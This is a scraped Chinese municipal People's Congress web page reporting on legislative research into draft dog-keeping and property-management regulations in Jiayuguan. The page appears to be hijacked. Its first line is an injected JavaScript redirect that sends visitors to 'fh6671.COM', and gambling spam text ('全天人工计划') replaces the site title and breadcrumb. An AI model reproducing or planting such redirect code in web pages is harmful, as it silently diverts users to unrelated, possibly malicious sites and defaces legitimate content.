function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新立法工作  >>  立法动态  
市人大常委会副主任韩峻峰一行到市司法局调研立法工作
来源: 市人大常委会办公室      日期: 2020-07-29      作者:       点击数:

市人大常委会副主任韩峻峰一行到市司法局调研立法工作

7月28日,市人大常委会副主任韩峻峰带领市人大法制委、市人大常委会法工委主要负责人及部分人大代表、法工委全体人员到市司法局调研《嘉峪关市养犬管理条例(草案)》《嘉峪关市物业管理条例(草案)》立法工作开展情况。

会上,市司法局局长张世虎分别汇报了《嘉峪关市养犬管理条例(草案)》的审查论证情况、条例的框架内容及对人民群众关注密切的养犬问题的回应及《嘉峪关市物业管理条例(草案)》的调研、起草情况、面临的实际困难和下一步工作计划等。

市公安局、住建局、城管执法局、房产服务中心等单位负责人,就我市两部《条例》的调研、起草、论证等情况分别进行了补充说明。

韩峻峰副主任对两部《条例(草案)》的立法开展情况给予了充分肯定,并就做好下一步工作提出了明确要求。一要坚持开门立法。扩大地方立法的公开透明度和公众参与度。通过召开座谈会、论证会、听证会等形式广泛听取吸收各方面的意见建议,平衡好各方诉求,司法行政部门要有针对性地加强指导,其他部门要密切配合,切实提高立法工作质量。二要深入调研学习。认真学习《民法典》等上位法,充分借鉴外地成功立法经验,尽可能把我市的情况掌握得全面准确,对好的经验做法了解清楚透彻,问题看得清、摸得准,解决问题的思路清、措施实,从而使得制度设计科学严密、切实可行。三要注重沟通协调。起草部门要扎实做好基础性工作,强化问题导向和目标导向,聚焦重点难点问题,科学合理地设计制度。对管理体制、职责分工等重大、复杂问题与其他相关部门存在意见分歧的,要及时沟通、充分协商,统一意见,使出台的地方性法规有特色、接地气、真管用,为提升城市管理水平提供有力法治保障。